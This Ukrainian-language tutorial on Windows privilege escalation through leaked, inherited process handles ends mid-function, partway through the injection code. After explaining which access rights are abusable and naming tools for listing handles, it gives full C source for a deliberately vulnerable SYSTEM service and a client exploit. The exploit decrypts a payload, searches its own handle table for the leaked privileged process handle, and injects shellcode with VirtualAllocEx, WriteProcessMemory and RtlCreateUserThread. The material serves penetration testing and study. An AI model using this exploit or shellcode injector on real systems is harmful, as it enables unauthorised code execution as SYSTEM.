Дескриптори в процесі дозволяють доступ до різних ресурсів Windows:
Вже було кілька випадків ескалації привілеїв, коли привілейований процес з відкритими та успадкованими дескрипторамизапустивнепривілейований процес, надаючи йому доступ до всіх цих дескрипторів.
Наприклад, уявіть, що процес, що працює як SYSTEM, відкриває новий процес (OpenProcess()) з повним доступом. Той же процес також створює новий процес (CreateProcess()) з низькими привілеями, але успадковує всі відкриті дескриптори основного процесу.
Тоді, якщо у вас є повний доступ до процесу з низькими привілеями, ви можете отримати відкритий дескриптор до привілейованого процесу, створеного з OpenProcess() і інжектувати shellcode.
Цікаві дескриптори
Процес
Як ви прочитали в початковому прикладі, якщо непривілейований процес успадковує дескриптор процесу привілейованого процесу з достатніми правами, він зможе виконати произвольний код на ньому.
В цьому відмінному артикулі ви можете побачити, як експлуатувати будь-який дескриптор процесу, який має будь-які з наступних прав:
PROCESS_ALL_ACCESS
PROCESS_CREATE_PROCESS
PROCESS_CREATE_THREAD
PROCESS_DUP_HANDLE
PROCESS_VM_WRITE
Потік
Схоже на дескриптори процесу, якщо непривілейований процес успадковує дескриптор потоку привілейованого процесу з достатніми правами, він зможе виконати произвольний код на ньому.
В цьому відмінному артикулі ви також можете побачити, як експлуатувати будь-який дескриптор процесу, який має будь-які з наступних прав:
THREAD_ALL_ACCESS
THREAD_DIRECT_IMPERSONATION
THREAD_SET_CONTEXT
Дескриптори файлів, ключів та секцій
Якщо непривілейований процес успадковуєдескриптор з права на запис над привілейованим файлом або реєстром, він зможе перезаписати файл/реєстр (і з великою удачею, ескалювати привілеї).
Дескриптори секцій подібні до дескрипторів файлів, загальна назва таких об'єктів - "File Mapping". Вони використовуються для роботи з великими файлами без зберігання всього файлу в пам'яті. Це робить експлуатацію "схожою" на експлуатацію дескриптора файлу.
Як переглядати дескриптори процесів
Process Hacker
Process Hacker - це інструмент, який ви можете безкоштовно завантажити. Він має кілька чудових опцій для перевірки процесів, і одна з них - це можливість переглядати дескриптори кожного процесу.
Зверніть увагу, що для перегляду всіх дескрипторів усіх процесів потрібен SeDebugPrivilege (тому вам потрібно запустити Process Hacker як адміністратор).
Щоб переглянути дескриптори процесу, клацніть правою кнопкою миші на процесі та виберіть Дескриптори:
Потім ви можете клацнути правою кнопкою миші на дескрипторі та перевірити права:
Sysinternals Handles
Handlesбінарний файл від Sysinternals також відобразить дескриптори на процес у консолі:
LeakedHandlesFinder
Цей інструмент дозволяє вам моніторити витік дескрипторів і навіть автоексплуатувати їх для ескалації привілеїв.
Методологія
Тепер, коли ви знаєте, як знаходити дескриптори процесів, вам потрібно перевірити, чи будь-який непривілейований процес має доступ до привілейованих дескрипторів. У такому випадку користувач процесу може отримати дескриптор і зловживати ним для ескалації привілеїв.
Було згадано раніше, що вам потрібен SeDebugPrivilege для доступу до всіх дескрипторів. Але користувач все ще може отримати доступ до дескрипторів своїх процесів, тому це може бути корисно, якщо ви хочете ескалювати привілеї лише з цього користувача, щоб виконати інструменти з регулярними правами користувача.
Наприклад, наступний код належить до Windows служби, яка буде вразливою. Вразливий код цього бінарного файлу служби знаходиться всередині Exploit функції. Ця функція починає створювати новий процес з повним доступом. Потім вона створює процес з низькими привілеями (копіюючи токен з низькими привілеями explorer.exe), виконуючи C:\users\username\desktop\client.exe. Вразливість полягає в тому, що вона створює процес з низькими привілеями з bInheritHandles як TRUE.
Отже, цей процес з низькими привілеями може захопити дескриптор високопривілейованого процесу, створеного спочатку, і інжектувати та виконати shellcode (див. наступний розділ).
#include<windows.h>#include<tlhelp32.h>#include<tchar.h>#pragmacomment (lib, "advapi32")TCHAR* serviceName =TEXT("HandleLeakSrv");SERVICE_STATUS serviceStatus;SERVICE_STATUS_HANDLE serviceStatusHandle =0;HANDLE stopServiceEvent =0;//Find PID of a proces from its nameintFindTarget(constchar*procname) {HANDLE hProcSnap;PROCESSENTRY32 pe32;int pid =0;hProcSnap =CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);if (INVALID_HANDLE_VALUE == hProcSnap) return0;pe32.dwSize =sizeof(PROCESSENTRY32);if (!Process32First(hProcSnap,&pe32)) {CloseHandle(hProcSnap);return0;}while (Process32Next(hProcSnap,&pe32)) {if (lstrcmpiA(procname,pe32.szExeFile)==0) {pid =pe32.th32ProcessID;break;}}CloseHandle(hProcSnap);return pid;}intExploit(void) {STARTUPINFOA si;PROCESS_INFORMATION pi;int pid =0;HANDLE hUserToken;HANDLE hUserProc;HANDLE hProc;// open a handle to itself (privileged process) - this gets leaked!hProc =OpenProcess(PROCESS_ALL_ACCESS,TRUE, GetCurrentProcessId());// get PID of user low privileged processif ( pid =FindTarget("explorer.exe") )hUserProc =OpenProcess(PROCESS_QUERY_INFORMATION,FALSE, pid);elsereturn-1;// extract low privilege token from a user's processif (!OpenProcessToken(hUserProc, TOKEN_ALL_ACCESS,&hUserToken)) {CloseHandle(hUserProc);return-1;}// spawn a child process with low privs and leaked handleZeroMemory(&si,sizeof(si));si.cb =sizeof(si);ZeroMemory(&pi,sizeof(pi));CreateProcessAsUserA(hUserToken,"C:\\users\\username\\Desktop\\client.exe",NULL,NULL,NULL,TRUE,0,NULL,NULL,&si,&pi);CloseHandle(hProc);CloseHandle(hUserProc);return0;}void WINAPI ServiceControlHandler( DWORD controlCode ) {switch ( controlCode ) {case SERVICE_CONTROL_SHUTDOWN:case SERVICE_CONTROL_STOP:serviceStatus.dwCurrentState = SERVICE_STOP_PENDING;SetServiceStatus( serviceStatusHandle,&serviceStatus );SetEvent( stopServiceEvent );return;case SERVICE_CONTROL_PAUSE:break;case SERVICE_CONTROL_CONTINUE:break;case SERVICE_CONTROL_INTERROGATE:break;default:break;}SetServiceStatus( serviceStatusHandle,&serviceStatus );}void WINAPI ServiceMain( DWORD argc, TCHAR* argv[] ) {// initialise service statusserviceStatus.dwServiceType = SERVICE_WIN32;serviceStatus.dwCurrentState = SERVICE_STOPPED;serviceStatus.dwControlsAccepted =0;serviceStatus.dwWin32ExitCode = NO_ERROR;serviceStatus.dwServiceSpecificExitCode = NO_ERROR;serviceStatus.dwCheckPoint =0;serviceStatus.dwWaitHint =0;serviceStatusHandle =RegisterServiceCtrlHandler( serviceName, ServiceControlHandler );if ( serviceStatusHandle ) {// service is startingserviceStatus.dwCurrentState = SERVICE_START_PENDING;SetServiceStatus( serviceStatusHandle,&serviceStatus );// do initialisation herestopServiceEvent =CreateEvent( 0,FALSE,FALSE,0 );// runningserviceStatus.dwControlsAccepted |= (SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_SHUTDOWN);serviceStatus.dwCurrentState = SERVICE_RUNNING;SetServiceStatus( serviceStatusHandle,&serviceStatus );Exploit();WaitForSingleObject( stopServiceEvent,-1 );// service was stoppedserviceStatus.dwCurrentState = SERVICE_STOP_PENDING;SetServiceStatus( serviceStatusHandle,&serviceStatus );// do cleanup hereCloseHandle( stopServiceEvent );stopServiceEvent =0;// service is now stoppedserviceStatus.dwControlsAccepted &=~(SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_SHUTDOWN);serviceStatus.dwCurrentState = SERVICE_STOPPED;SetServiceStatus( serviceStatusHandle,&serviceStatus );}}voidInstallService() {SC_HANDLE serviceControlManager =OpenSCManager( 0,0, SC_MANAGER_CREATE_SERVICE );if ( serviceControlManager ) {TCHAR path[ _MAX_PATH +1 ];if ( GetModuleFileName( 0, path,sizeof(path)/sizeof(path[0]) )>0 ) {SC_HANDLE service =CreateService( serviceControlManager,serviceName, serviceName,SERVICE_ALL_ACCESS, SERVICE_WIN32_OWN_PROCESS,SERVICE_AUTO_START, SERVICE_ERROR_IGNORE, path,0,0,0,0,0 );if ( service )CloseServiceHandle( service );}CloseServiceHandle( serviceControlManager );}}voidUninstallService() {SC_HANDLE serviceControlManager =OpenSCManager( 0,0, SC_MANAGER_CONNECT );if ( serviceControlManager ) {SC_HANDLE service =OpenService( serviceControlManager,serviceName, SERVICE_QUERY_STATUS | DELETE );if ( service ) {SERVICE_STATUS serviceStatus;if ( QueryServiceStatus( service,&serviceStatus ) ) {if ( serviceStatus.dwCurrentState == SERVICE_STOPPED )DeleteService( service );}CloseServiceHandle( service );}CloseServiceHandle( serviceControlManager );}}int_tmain( int argc, TCHAR* argv[] ){if ( argc >1&&lstrcmpi( argv[1], TEXT("install") )==0 ) {InstallService();}elseif ( argc >1&&lstrcmpi( argv[1], TEXT("uninstall") )==0 ) {UninstallService();}else {SERVICE_TABLE_ENTRY serviceTable[]= {{ serviceName, ServiceMain },{ 0,0 }};StartServiceCtrlDispatcher( serviceTable );}return0;}
Exploit Example 1
У реальному сценарії ви, ймовірно, не зможете контролювати бінарний файл, який буде виконаний вразливим кодом (C:\users\username\desktop\client.exe в цьому випадку). Ймовірно, ви зкомпрометуєте процес і вам потрібно буде перевірити, чи можете ви отримати доступ до будь-якого вразливого дескриптора будь-якого привілейованого процесу.
У цьому прикладі ви можете знайти код можливого експлойту для C:\users\username\desktop\client.exe.
Найцікавіша частина цього коду знаходиться в GetVulnProcHandle. Ця функція почне отримувати всі дескриптори, потім перевірить, чи належить будь-який з них до того ж PID і чи належить дескриптор до процесу. Якщо всі ці вимоги виконані (знайдено доступний відкритий дескриптор процесу), вона намагається впровадити та виконати shellcode, зловживаючи дескриптором процесу.
Впровадження shellcode виконується всередині Inject функції, і вона просто запише shellcode всередині привілейованого процесу та створить потік всередині того ж процесу для виконання shellcode).
#include<windows.h>#include<stdio.h>#include<stdlib.h>#include<string.h>#include<time.h>#include<wincrypt.h>#include<psapi.h>#include<tchar.h>#include<tlhelp32.h>#include"client.h"#pragmacomment (lib, "crypt32.lib")#pragmacomment (lib, "advapi32")#pragmacomment (lib, "kernel32")intAESDecrypt(char* payload,unsignedint payload_len,char* key,size_t keylen) {HCRYPTPROV hProv;HCRYPTHASH hHash;HCRYPTKEY hKey;if (!CryptAcquireContextW(&hProv,NULL,NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)){return-1;}if (!CryptCreateHash(hProv, CALG_SHA_256,0,0,&hHash)){return-1;}if (!CryptHashData(hHash, (BYTE*)key, (DWORD)keylen,0)){return-1;}if (!CryptDeriveKey(hProv, CALG_AES_256, hHash,0,&hKey)){return-1;}if (!CryptDecrypt(hKey, (HCRYPTHASH) NULL,0,0, payload,&payload_len)){return-1;}CryptReleaseContext(hProv,0);CryptDestroyHash(hHash);CryptDestroyKey(hKey);return0;}HANDLE GetVulnProcHandle(void) {ULONG handleInfoSize =0x10000;NTSTATUS status;PSYSTEM_HANDLE_INFORMATION phHandleInfo = (PSYSTEM_HANDLE_INFORMATION) malloc(handleInfoSize);HANDLE hProc =NULL;POBJECT_TYPE_INFORMATION objectTypeInfo;PVOID objectNameInfo;UNICODE_STRING objectName;ULONG returnLength;HMODULE hNtdll =GetModuleHandleA("ntdll.dll");DWORD dwOwnPID =GetCurrentProcessId();pNtQuerySystemInformation =GetProcAddress(hNtdll,"NtQuerySystemInformation");pNtDuplicateObject =GetProcAddress(hNtdll,"NtDuplicateObject");pNtQueryObject =GetProcAddress(hNtdll,"NtQueryObject");pRtlEqualUnicodeString =GetProcAddress(hNtdll,"RtlEqualUnicodeString");pRtlInitUnicodeString =GetProcAddress(hNtdll,"RtlInitUnicodeString");printf("[+] Grabbing handles...");while ((status =pNtQuerySystemInformation( SystemHandleInformation, phHandleInfo, handleInfoSize,NULL )) == STATUS_INFO_LENGTH_MISMATCH)phHandleInfo = (PSYSTEM_HANDLE_INFORMATION) realloc(phHandleInfo, handleInfoSize *=2);if (status != STATUS_SUCCESS){printf("[!] NtQuerySystemInformation failed!\n");return0;}printf("done.\n[+] Fetched %d handles.\n",phHandleInfo->NumberOfHandles);// iterate handles until we find the privileged process handlefor (int i =0; i <phHandleInfo->NumberOfHandles; ++i){SYSTEM_HANDLE_TABLE_ENTRY_INFO handle =phHandleInfo->Handles[i];// Check if this handle belongs to our own processif (handle.UniqueProcessId != dwOwnPID)continue;objectTypeInfo = (POBJECT_TYPE_INFORMATION) malloc(0x1000);if (pNtQueryObject( (HANDLE) handle.HandleValue,ObjectTypeInformation,objectTypeInfo,0x1000,NULL )!= STATUS_SUCCESS)continue;// skip some objects to avoid getting stuck// see: https://github.com/adamdriscoll/PoshInternals/issues/7if (handle.GrantedAccess ==0x0012019f&&handle.GrantedAccess !=0x00120189&&handle.GrantedAccess !=0x120089&&handle.GrantedAccess !=0x1A019F ) {free(objectTypeInfo);continue;}// get object name informationobjectNameInfo =malloc(0x1000);if (pNtQueryObject( (HANDLE) handle.HandleValue,ObjectNameInformation,objectNameInfo,0x1000,&returnLength )!= STATUS_SUCCESS) {// adjust the size of a returned object and query againobjectNameInfo =realloc(objectNameInfo, returnLength);if (pNtQueryObject( (HANDLE) handle.HandleValue,ObjectNameInformation,objectNameInfo,returnLength,NULL )!= STATUS_SUCCESS) {free(objectTypeInfo);free(objectNameInfo);continue;}}// check if we've got a process objectobjectName =*(PUNICODE_STRING) objectNameInfo;UNICODE_STRING pProcess;pRtlInitUnicodeString(&pProcess, L"Process");if (pRtlEqualUnicodeString(&objectTypeInfo->TypeName,&pProcess,TRUE)) {printf("[+] Found process handle (%x)\n",handle.HandleValue);hProc = (HANDLE) handle.HandleValue;free(objectTypeInfo);free(objectNameInfo);break;}elsecontinue;free(objectTypeInfo);free(objectNameInfo);}return hProc;}intInject(HANDLE hProc,unsignedchar* payload,unsignedint payload_len) {LPVOID pRemoteCode =NULL;HANDLE hThread =NULL;BOOL bStatus =FALSE;pVirtualAllocEx =GetProcAddress(GetModuleHandle("kernel32.dll"),"VirtualAllocEx");pWriteProcessMemory =GetProcAddress(GetModuleHandle("kernel32.dll"),"WriteProcessMemory");pRtlCreateUserThread =GetProcAddress(GetModuleHandle("ntdll.dll"),"RtlCreateUserThread");pRemoteCode =pVirtualAllocEx(hProc,NULL, payload_len, MEM_COMMIT, PAGE_EXECUTE_READ);pWriteProcessMemory(hProc, pRemoteCode, (PVOID)payload, (SIZE_T)payload_len, (SIZE_T *)NULL);bStatus = (BOOL) pRtlCreateUserThread(hProc,NULL,